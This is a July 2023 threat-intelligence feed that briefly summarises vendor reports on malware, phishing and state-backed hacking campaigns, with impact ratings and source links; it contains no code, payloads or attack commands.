- Researchers from Malwarebytes have observed a new campaign called FakeSG is distributing the NetSupport RAT through hacked WordPress websites. It uses fake browser update templates to deceive users. The payload is delivered via Internet shortcuts or zipped downloads.
—
- Intel Source:
- Cofense
- Intel Name:
- The_Use_of_HTML_Attachments_in_Phishing_Campaigns_Has_Increased
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Cofense have observed developments in the phishing and email security scene. The use of HTML attachments in dangerous phishing attempts has increased significantly, by 168% and 450%, respectively, compared to both Q1 and Q2 of the preceding two years.
Source:
https://cofense.com/blog/html-attachments-used-in-malicious-phishing-campaigns/
—
- Intel Source:
- Permiso
- Intel Name:
- Agile_Approach_to_Mass_Cloud_Credential_Harvesting_and_Crypto_Mining_Sprints_Ahead
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Permiso have observed Attackers are using an agile approach for mass cloud credential harvesting and crypto mining. They developed and deployed incremental iterations of their malware, targeting multiple cloud services. The campaign includes multi-cloud support, possible German-speaking actors, and hosting on Nice VPS.
—
- Intel Source:
- Rapid7
- Intel Name:
- Exploiting_Several_Adobe_ColdFusion_Vulnerabilities_Actively
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Rapid7 have discovered that criminals are actively taking advantage of two ColdFusion flaws to circumvent authentication, remotely execute commands, and install webshells on vulnerable servers. Threat actors are combining exploits for the critical remote code execution vulnerability CVE-2023-38203 and the access control bypass vulnerability CVE-2023-29298.
—
- Intel Source:
- Sonatype
- Intel Name:
- NullRAT_InfoStealer_Targeting_PyPI_Package_for_Windows
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Sonatype’s automated malware detection systems discovered sonatype-2023-2950, a malicious PyPI package with the name “feur,” which has since been taken down.
—
- Intel Source:
- Symantec
- Intel Name:
- Modified_Sardonic_Backdoor_by_FIN8_Group
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Symantec researchers have found evidence of the financially motivated threat actor known as FIN8 employing a “revamped” variation of the Sardonic backdoor to spread the BlackCat ransomware.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor
—
- Intel Source:
- Netscope
- Intel Name:
- AWS_Amplify_Hosted_Phishing_Campaigns
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Last couple months, Netskope Threat Labs researchers observed an increase in traffic to phishing pages hosted in AWS Amplify. These attacks have been targeting victims across different segments, led by the technology and finance verticals.
Source:
https://www.netskope.com/de/blog/aws-amplify-hosted-phishing-campaigns-abusing-telegram-static-forms
—
- Intel Source:
- Bleeding Computer, Jumpcloud
- Intel Name:
- JumpCloud_had_a_breach_by_state_backed_APT_hacking_group
- Date of Scan:
- 2023-07-23
- Impact:
- MEDIUM
- Summary:
- US-based enterprise software firm JumpCloud says a state-backed hacking group breached its systems almost one month ago as part of a highly targeted attack focused on a limited set of customers. The company discovered the incident on June 27, one week after the attackers breached its systems via a spear-phishing attack. On July 5, JumpCloud discovered “unusual activity in the commands framework for a small set of customers” while investigating the attack and analyzing logs for signs of malicious activity.
Source:
https://www.bleepingcomputer.com/news/security/jumpcloud-discloses-breach-by-state-backed-apt-hacking-group/
https://jumpcloud.com/support/july-2023-iocs
—
- Intel Source:
- Microsoft
- Intel Name:
- The_deeper_details_of_Storm_0558_techniques_for_unauthorized_access
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Earlier this month, Microsoft shared detailed information about a malicious campaign by a threat actor Storm-0558 that targeted customer email. Microsoft continued their investigation into this incident and deployed defense in depth to harden all systems involved, additionally they are providing their deeper analysis of the observed actor techniques for obtaining unauthorized access to email data, tools, and unique infrastructure characteristics.
—
- Intel Source:
- Perception Point
- Intel Name:
- A_complex_phishing_operation_Manipulated_Caiman
- Date of Scan:
- 2023-07-22
- Impact:
- LOW
- Summary:
- Perception Point investigated for a complex phishing operation that cwas called “Manipulated Caiman”. The threat actor, Manipulated Caiman, based on one of the files analyzed, containing the words “Loader Manipulado” in the pdb path. Seems like attacker’s origin is likely Latin America. Manipulated Caiman employs spear phishing with malicious attachments to deliver malware, such as URSA, SMTP bruteforce client, malicious extension installer, net info checker, and spammer client.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- The_delivery_of_BlotchyQuasar_malware
- Date of Scan:
- 2023-07-22
- Impact:
- MEDIUM
- Summary:
- IBM Security X-Force discovered some phishing emails leading to packed executable files delivering malware called BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments.
—
- Intel Source:
- eSentire
- Intel Name:
- The_Delivery_of_Sorillus_RAT
- Date of Scan:
- 2023-07-21
- Impact:
- LOW
- Summary:
- Esentire researchers have identified Sorillus RAT, and a phishing page delivering using HTML smuggled files and links using Google’s Firebase Hosting service.
Source:
https://www.esentire.com/blog/google-firebase-hosting-abused-to-deliver-sorillus-rat-phishing-page
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_High_Evasive_Blank_Grabber_Returns
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified an infostealer builder known as ‘Blank Grabber’. It is released in 2022, however, since then, it has been frequently updated with 85 contributions to the project in the last one month alone. The infostealer targets Windows operating systems and possesses a wide range of capabilities aimed at stealing sensitive information from unsuspecting users.
Source:
https://www.cyfirma.com/outofband/blank-grabber-returns-with-high-evasiveness/
—
- Intel Source:
- Citizenlab
- Intel Name:
- The_Analysis_of_HKLEAKS_Campaign
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Researchers from Citizen Lab have conducted a forensic analysis of the entire identifiable digital footprint of the HKLEAKS campaign. In August 2019, at the height of the Anti-Extradition Bill protests that rocked Hong Kong, a series of websites branded “HKLEAKS” began surfacing on the web. Claiming to be run by anonymous citizens, they systematically exposed (“dotted”) the personal identifiable information of protesters, journalists, and other individuals perceived as affiliated with the protest movement.
—
- Intel Source:
- Vadesecure
- Intel Name:
- M365_Phishing_Email_Analysis
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Vade’s researchers have detected a new Microsoft 365 phishing attack and analyzed an email containing a malicious HTML attachment.
Source:
https://www.vadesecure.com/en/blog/m365-phishing-email-analysis-eevilcorp
—
- Intel Source:
- Fortinet
- Intel Name:
- Diving_Deep_into_Rancoz_Ransomware
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed that a few months back the Rancoz ransomware first came to the public’s attention. However, it’s important to raise awareness of this ransomware variant, as the most recent victim on their data leak site on TOR dates back just a few weeks to mid-June.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-rancoz
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_activities_of_the_UAC_0010_group_as_of_July_2023
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The continuous accumulation and analysis of data on cyber incidents allows us to conclude that one of the most persistent cyber threats is UAC-0010 (Armageddon), the activities of which are carried out by former “officers” of the State Security Service of Crimea, who in 2014 betrayed their military oath and began to serve the FSB of Russia. The main task of the group is cyberespionage against the security and defense forces of Ukraine. At the same time, we know at least one case of destructive activity at an information infrastructure facility.
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- DomainNetworks_Mail_Scam
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified domainNetworks is a fraudulent company behind a snail mail scam targeting domain owners. Its true operators remain unidentified, despite connections to thedomainsvault.com and UBSagency. These scams trick organizations into paying for unnecessary services.
—
- Intel Source:
- Trustwave
- Intel Name:
- Enterprise_Applications_Honeypot_revealed_some_findings
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Trustwave researchers have established a honeypot sensors network across six countries: Russia, Ukraine, Poland, UK, China, and the United States. Also, they present the most intriguing findings from the research into exposing vulnerable enterprise applications, such as Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian BitBucket, and F5 Big-IP.s
—
- Intel Source:
- Lab52
- Intel Name:
- New_Invitation_From_APT29_to_Use_CCleaner
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from Lab52 have seen a phishing effort that appears to be the Norwegian embassy inviting people to a party. The format of this particular “invitation” is in .svg. When the file is opened, a script is run that mounts and downloads an ISO file that contains the subsequent infection stage. The .svg file serves as an HTML smuggler in this manner, infecting the target and causing them to skip the subsequent stage.
Source:
https://lab52.io/blog/2344-2/
—
- Intel Source:
- Kaspersky, Palant
- Intel Name:
- Malicious_extensions_in_Chrome_Web_Store
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The subpage of the Kaspersky official blog discusses the discovery of malicious extensions in the Chrome Web Store with a total of 87 million downloads. The most popular extension, “Autoskip for Youtube,” had nine million downloads. Users are advised to check and uninstall any malicious extensions as they can access user data.
Source:
https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/
https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/
—
- Intel Source:
- Uptycs
- Intel Name:
- Fake_PoC_for_Linux_Kernel_Vulnerability_on_GitHub
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Cybersecurity researchers continue to be under the radar of malicious actors, a proof-of-concept (PoC) has been discovered on GitHub, concealing a backdoor with a “crafty” persistence method.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
—
- Intel Source:
- CERT-HR
- Intel Name:
- WordPress_Plugin_ULTIMATE_MEMBER_Is_Vulnerable
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- CERT-HR researchers have observed that ‘Ultimate Member’ is a plugin that allows registration and management of communities on WordPress sites. The critical vulnerability (CVE-2023-3460) has been rated 9.8. All versions of the plugin, which has more than 200,000 active installations, are vulnerable.
—
- Intel Source:
- Sucuri
- Intel Name:
- A_variant_of_a_common_malware_injection
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- A recent investigation found malware injecting obfuscated JavaScript into legitimate files, redirecting website traffic to a parked domain for ad monetization. The injected script creates an invisible iframe from the parked domain, generating ad revenue and potentially redirecting visitors to questionable sites.
Source:
https://blog.sucuri.net/2023/07/malicious-injection-redirects-traffic-to-parked-domain.html
—
- Intel Source:
- Rapid7
- Intel Name:
- Old_Blackmoon_Trojan_NEW_Monetization_Approach
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
-
Rapid7 has discovered a new campaign using the Blackmoon trojan targeting businesses in the USA and Canada.
This campaign focuses on implementing evasion and persistence techniques, such as disabling Windows Defender.
The trojan uses various persistence techniques, process injection, and exploits for remote services.
It disables security tools, hijacks resources, and communicates with a Command and Control server using web protocols.
The webpage includes file names, MD5 hashes, email addresses, a reference to a C&C server, and a link to a related article on monitor persistence.
Source:
https://www.rapid7.com/blog/post/2023/07/13/old-blackmoon-trojan-new-monetization-approach/
—
- Intel Source:
- Wordfence
- Intel Name:
- Massive_Targeted_Exploit_Campaign_Against_WooCommerce_Payments
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified there is an ongoing exploit campaign targeting a vulnerability in the WooCommerce Payments plugin. Attackers can gain administrative privileges on vulnerable websites. Wordfence provides protection against this vulnerability
—
- Intel Source:
- Symantec, Cyble
- Intel Name:
- Microsoft_ZeroDay_Vulnerability_Exploited_by_Attackers
- Date of Scan:
- 2023-07-18
- Impact:
- HIGH
- Summary:
-
Attackers are making use of a zero-day vulnerability (CVE-2023-36884) that affects Microsoft Windows and Office products. The exploit has so far been applied in extremely targeted attacks against businesses in the European and North American government and defense industries.
Link: https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-zeroday-exploit
—
- Intel Source:
- FACCT
- Intel Name:
- RedCurl_Hackers_Return_to_Spy_on_Major_Russian_Banks
- Date of Scan:
- 2023-07-18
- Impact:
- MEDIUM
- Summary:
- According to FACCT, the Russian-speaking Red Curl organization has attacked businesses in the UK, Germany, Canada, Norway, Ukraine, and Australia at least 34 times. Twenty of the attacks—more than half—took place in Russia. Construction, financial, consultancy, retail, banking, insurance, and legal enterprises were among the victims of cyber espionage.
Source:
https://www.facct.ru/blog/redcurl-2023/?utm_source=twitter&utm_campaign=redcurl-23&utm_medium=social
—
- Intel Source:
- Sysdig
- Intel Name:
- SCARLETEEL_2
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Sysdig observed the their most recent activities of new version of SCARLTEEL 2.0. The analysts saw a similar strategy to previously reported of compromise AWS accounts through exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped. By knowing the details of SCARLETEEL previously, it was discovered they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Credential_Stealer_Expands_to_Azure_GCP_from_AWS
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- This ad shows the development of an experienced cloud actor who is knowledgeable about a variety of technologies. The actor apparently underwent a great deal of trial and error, as evidenced by decisions like feeding the curl binary to systems that do not already have it. Additionally, the actor has enhanced the tool’s data layout to promote more autonomous engagement, displaying a certain amount of maturity and proficiency.
—
- Intel Source:
- Talos
- Intel Name:
- Malicious_Campaigns_Targeting_Civilian_Military_and_Governmental_Organisations
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Talos have identified a threat actor who has been running various campaigns in Poland and Ukraine against civilian users, military groups, and governmental institutions. They determined that these actions are most likely carried out with the intent to steal data and gain ongoing remote access.
Source:
https://blog.talosintelligence.com/malicious-campaigns-target-entities-in-ukraine-poland/
—
- Intel Source:
- Fortinet
- Intel Name:
- Microsoft_Office_Vulnerabilities_and_Macros_Used_by_LokiBot_Campaign
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Several malicious Microsoft Office documents created to take advantage of known vulnerabilities have been found by FortiGate researchers. Remote code execution flaws include CVE-2021-40444 and CVE-2022-30190 specifically. By taking advantage of these flaws, the attackers were able to insert malicious macros into Microsoft documents that, when used, installed the LokiBot malware on the victim’s computer
—
- Intel Source:
- PaloAlto
- Intel Name:
- Beware_of_Cloaked_Ursa_Phishing_Scam
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- Unit 42 researchers have observed instances of Cloaked Ursa using lures focusing on the diplomats themselves more than the countries they represent. Also, identified Cloaked Ursa targeting diplomatic missions within Ukraine by leveraging something that all recently placed diplomats need – a vehicle.
Source:
https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
—
- Intel Source:
- AT&T
- Intel Name:
- Attackers_Leveraging_OneNote_to_Deliver_Malware
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Malware distributed using phishing emails with a OneNote attachment has increased from December 22nd, 2022. The end user would open the OneNote attachment, as they do with most phishing emails, but OneNote does not support macros like Microsoft Word or Excel do. Threat actors have historically used this method to launch programs that install malware.
—
- Intel Source:
- Aquasec
- Intel Name:
- Introducing_TeamTNT_New_Cloud_Campaign
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- AquaSec researchers have uncovered an emerging campaign that is targeting exposed Docker APIs and JupyterLab instances. Upon further investigation of the infrastructure, found evidence of a broader campaign orchestrated by TeamTNT.
Source:
https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign
—
- Intel Source:
- Lumen
- Intel Name:
- Exploring_AVrecon_Underground_Routers
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Another multi-year scheme involving infected routers all around the world is discovered by Lumen Black Lotus Labs. Small-office/home-office (SOHO) routers are infected as part of a sophisticated operation that uses the Linux-based Remote Access Trojan (RAT) known as “AVrecon.”
Source:
https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Modify_TeamViewer_Installer_to_Deliver_njRAT
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble have discovered a noteworthy occurrence involving the false use of a TeamViewer program file. A popular software program called TeamViewer enables remote control, desktop sharing, online meetings, file transfers, and group collaboration across numerous devices.
Source:
https://blog.cyble.com/2023/07/13/trojanized-application-preying-on-teamviewer-users/
—
- Intel Source:
- ThreatFabric
- Intel Name:
- A_New_Sophisticated_Toolkit_For_Vishing_Called_Letscall
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from Threat Fabric have identified a new sophisticated Vishing toolset called Letscall which currently targeting individuals from South Korea.
Source:
https://www.threatfabric.com/blogs/letscall-new-sophisticated-vishing-toolset
—
- Intel Source:
- TrendMicro
- Intel Name:
- BPFDoor_Backdoor_Variants_Abusing_BPF_Filters
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- BPFDoor has since become more difficult to detect due to the improved usage of Berkeley Packet Filter (BPF), a technology that allows programs to attach network filters to an open socket that’s being used by the threat actors behind BPFDoor to bypass firewalls’ inbound traffic rules and similar network protection solutions in Linux and Solaris operating systems (OS).
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malicious_Extension
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- The specific information on this subpage includes a password-protected RAR archive with the passwords 888 or 999. An MSI file has been analyzed, and it is mentioned that Malwarebytes EDR and MDR can remove ransomware remnants and prevent reinfection. There is also a free trial available for Malwarebytes’ cybersecurity services
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Threat_Group_Using_Chrome_Remote_Desktop
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- Remote Desktop by the Kimsuky threat group, supported by North Korea, for their attacks. The group utilizes their own AppleSeed malware, as well as other remote control tools like Meterpreter and VNC, to gain control over infected systems. The Kimsuky group mainly distributes malware through spear phishing emails containing HWP and MS Office document files or CHM files. They also use Infostealer to gather sensitive information.
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_Distribution_via_Email
- Date of Scan:
- 2023-07-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a mass mailing of electronic messages with the subject “Invoice” and an attachment in the form of the file “Act_Zvirky_ta_rah.fakt_vid_12_07_2023.zip” containing the VBS file “invoice_from_12_07_2023_to_payment .vbs “, the opening of which will ensure that the SmokeLoader malware is downloaded and launched.
—
- Intel Source:
- Mandiant
- Intel Name:
- Stealing_Secrets_With_Infected_USB_Drives
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- Mandiant researchers have observed a threefold increase in the number of attacks using infected USB drives to steal secrets. The campaign named ‘Sogu,’ attributed to a Chinese espionage threat group ‘TEMP.HEX,’ and another named ‘Snowydrive,’ attributed to UNC4698, which targets oil and gas firms in Asia.
Source:
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets
—
- Intel Source:
- Talos
- Intel Name:
- RedDriver_targets_Chinese_speakers_and_internet_cafes
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The specific information on this subpage describes an undocumented browser hijacker called RedDriver. It explains that RedDriver targets Chinese speakers and internet cafes, and uses the Windows Filtering Platform to intercept browser traffic. It bypasses driver signature enforcement policies and utilizes stolen certificates. The authors of RedDriver are skilled in driver development and have deep knowledge of the Windows operating system. The subpage also includes a list of domains associated with RedDriver and provides various software and support resources offered by Talos.
Source:
https://blog.talosintelligence.com/undocumented-reddriver/
—
- Intel Source:
- Wiz
- Intel Name:
- The_cloud_workloads_targeted_by_Python_based_fileless_malware
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- This subpage discusses the PyLoose fileless malware that targets cloud workloads. It provides information on the attack flow, including initial access, Python script drop, fileless execution, and in-memory XMRig execution. It mentions the attacker’s Monero wallet address and provides details about the PyLoose loader’s associated files and hash values. The subpage also references other articles and promotes the Wiz platform for cloud security.
Source:
https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads
—
- Intel Source:
- Huntress
- Intel Name:
- Business_Email_Compromise_hunting_details
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The subpage specifically discusses threat hunting for business email compromise (BEC) using user agents on Microsoft 365. The author shares their approach and examples of suspicious user agents.vThey emphasize the importance of baseline user behavior, detection technology, The subpage also includes information on terms of use, privacy policy, legalities, and cookie policy of Huntress, with an option to sign up for blog updates.and prevention measures like multi-factor authentication.
Source:
https://www.huntress.com/blog/threat-hunting-for-business-email-compromise-through-user-agents
—
- Intel Source:
- Blackberry
- Intel Name:
- The_suspicion_of_targeting_Ukraine_s_NATO_Membership_Talks_by_RomCom_Threat_Actor
- Date of Scan:
- 2023-07-12
- Impact:
- MEDIUM
- Summary:
- In the bebinning of this month, the BlackBerry Threat researchers found two malicious documents came from an IP address in Hungary, sent as bate to an organization supporting Ukraine abroad, and a document targeting upcoming NATO Summit guests. Blackberry analysis assume to conclude that the threat actor known as RomCom who is behind this operation. Based on our internal network data analysis, and the full set of cyber tools were collected, was believed the threat actor behind this campaign ran their first drills on June 22, and also a few days before the command-and-control (C2) mentioned in their report was registered and went live.
Source:
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
—
- Intel Source:
- Uptycs
- Intel Name:
- Deceptive_PoC_poses_hidden_backdoor
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Uptycs reserachers discovered Backdoor disguised as innocuous learning tool targets Linux systems. Ensure removal of unauthorized SSH keys, delete kworker file, remove kworker path from bashrc file, and check /tmp/.iCE-unix.pid for potential threats. Exercise caution when testing PoCs and utilize isolated environments for protection.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
—
- Intel Source:
- Microsoft
- Intel Name:
- StormP_0978_phishing_campaign_uncovered_by_Microsoft
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Microsoft identifies Storm-0978 targeting defense and government entities in Europe and North America. Exploiting CVE-2023-36884, they employ phishing campaigns and distribute the RomCom backdoor. Storm-0978 conducts opportunistic ransomware and espionage-related operations
—
- Intel Source:
- Zscalar
- Intel Name:
- Analysis_of_New_MultiStage_Attack_Targeting_LATAM_Region
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- Zscaler researchers have uncovered a concerning development, a new targeted attack campaign striking businesses in the Latin American (LATAM) region. This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Rootkit_acts_as_a_universal_loader
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- TrendMicro researchers observed New signed rootkit discovered originating from China targets the gaming sector. The rootkit acts as a universal loader and communicates with a command-and-control infrastructure. It has passed through the Windows Hardware Quality Labs process and obtained a valid signature. Reported to Microsoft’s Security Response Center.
—
- Intel Source:
- ASEC
- Intel Name:
- Rekoobe_Backdoor_targeting_Linux_systems_in_Korea
- Date of Scan:
- 2023-07-11
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has been receiving reports of the Rekoobe malware from tenants in Korea for several years, and will hereby share its brief analysis. Additionally, the Rekoobe variants will be categorized along with a summary of the ones used to target Korean companies.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_malicious_batch_file
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware in the form of a batch file (*.bat). This malware is designed to download various scripts based on the anti-malware process, including AhnLab products, installed in the user’s environment. Based on the function names used by the malware and the downloaded URL parameters, it is suspected to have been distributed by the Kimsuky group
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_malvertising_USPS_campaign
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Malwarebytes researechers observed a recent phishing attack that was targeting both mobile and Desktop users looking up to track their packages via the United States Postal Service website.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Ukrainian_Public_Entities_Are_Targeted_by_UAC_0057
- Date of Scan:
- 2023-07-10
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a new targeted cyber attack by the UAC-0057 group against Ukrainian public officials leveraging XLS files that contain a malicious macro spreading PicassoLoader malware. The malicious loader is capable of dropping another malicious strain dubbed njRAT to spread the infection further.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Deep_details_of_Big_Head_Ransomware_s_Variants
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Deeper analyses and updates IOCs
—
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing_Attacks_by_APT28_Group
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered HTML files that imitate the web interface of mail services and implement the technical possibility of exfiltrating authentication data entered by the victim using HTTP POST requests. At the same time, the transfer of stolen data is carried out using previously compromised Ubiquiti devices (EdgeOS)
—
- Intel Source:
- Lab52
- Intel Name:
- Unknown_Actor_Targeting_Chinese_Users_With_APT29_TTP
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Lab52 researchers have identified a different maldoc samples of a potential malicious campaign. The maldoc seems to be a campaign against Chinese speaking users as the content of the maldoc is written in Chinese. The infection chain is similar to the threat actor APT29, however it has been identified significant differences related to the typical APT29’s infection chain that makes consider that it does not seem to be this threat actor.
Source:
https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_BlackByte_ransomware_deep_analyses
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Microsoft Incident Response team observed threat actor went through the full attack chain, from initial access to impact in less than five days, causing a huge impact on the business disruption for the victim organization. Their findings dicovered that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives.
—
- Intel Source:
- ASEC, Ciberdefensa
- Intel Name:
- The_distribution_of_NetSupport_RAT
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- ASEC lab reserachers discovered NetSupport RAT being distributed via a spear phishing email that has recently been in circulation. Their analyses showed the whole provess flow from its distribution via phishing emails and its detection.
Source:
https://ciberdefensa.cat/archivos/16021
https://asec.ahnlab.com/en/55146/
—
- Intel Source:
- CISA
- Intel Name:
- Increasing_TrueBot_Malware_Attacks
- Date of Scan:
- 2023-07-09
- Impact:
- MEDIUM
- Summary:
- CISA researchers have warned about the emergence of new variants of the TrueBot malware. These variants specifically target organizations in the United States and Canada, aiming to extract sensitive data from compromised networks.
—
- Intel Source:
- Cyble
- Intel Name:
- Ransomware_Lists_Victim_Host_Information_in_Ransom_Note
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a new ransomware strain named “Underground team ransomware,” The ransom note of the Underground Team ransomware introduces novel elements that distinguish it from typical ransom notes. In addition to guaranteeing a fair and confidential deal within a short timeframe, the group offers more than just a decryptor.
Source:
https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/
—
- Intel Source:
- Proofpoint
- Intel Name:
- Analysis_of_TA453s_Foray_into_LNKs_and_Mac_Malware
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Proofpoint researchers have observed that TA453 continues to adapt its malware arsenal, deploying novel file types and targeting new operating systems, specifically sending Mac malware to one of its recent targets.
—
- Intel Source:
- Cyble
- Intel Name:
- ARCrypter_ransomware_activity
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- ARCrypter ransomware, also known as ChileLocker, got attention since last August 2022 with their attack in Chile. Soon, researchers discovered that this ransomware started targeting organizations worldwide. It has been observed that ARCrypter ransomware targets both Windows and Linux operating systems.This year, researchers reported the existanse of a new Linux variant of ARCrypter, developed using the GO programming language and also an updated version of the ARCrypt Windows executable. The TA discovered the new techniques of TA to interact with their victims. In comparasing with the older variant of ARCrypt ransomware, the researcgers identified the following: The ransom note of each binary was pointing to a mirror site and the TA created dedicated chat sites hosted on Tor for each victim.
—
- Intel Source:
- Aquasec
- Intel Name:
- Analysis_of_Silentbobs_Cloud_Attack
- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Aqua Nautilus researchers have identified an infrastructure of a potentially massive campaign against cloud-native environments. It is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware, cloud credentials hijack, resource hijack and further infestation of the worm.
Source:
https://blog.aquasec.com/threat-alert-anatomy-of-silentbobs-cloud-attack
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_NPM_Packages_Fuel_Supply_Chain_and_Phishing_Attacks
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- ReversingLabs researchers have discovered more than a dozen malicious packages published to the npm open-source repository that appear to target application end users while also supporting email phishing campaigns targeting Microsoft 365 users.
—
- Intel Source:
- Reliaquest
- Intel Name:
- The_Details_of_Infection_of_Gootloader_Led_to_Credential_Access
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- The ReliaQuest researchers have responded to an incident involving credential access and exfiltration that was traced back to the JavaScript-based initial access malware “Gootloader.”
Source:
https://www.reliaquest.com/blog/gootloader-infection-credential-access/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_From_China_Targeting_Europe_in_SmugX_Campaign
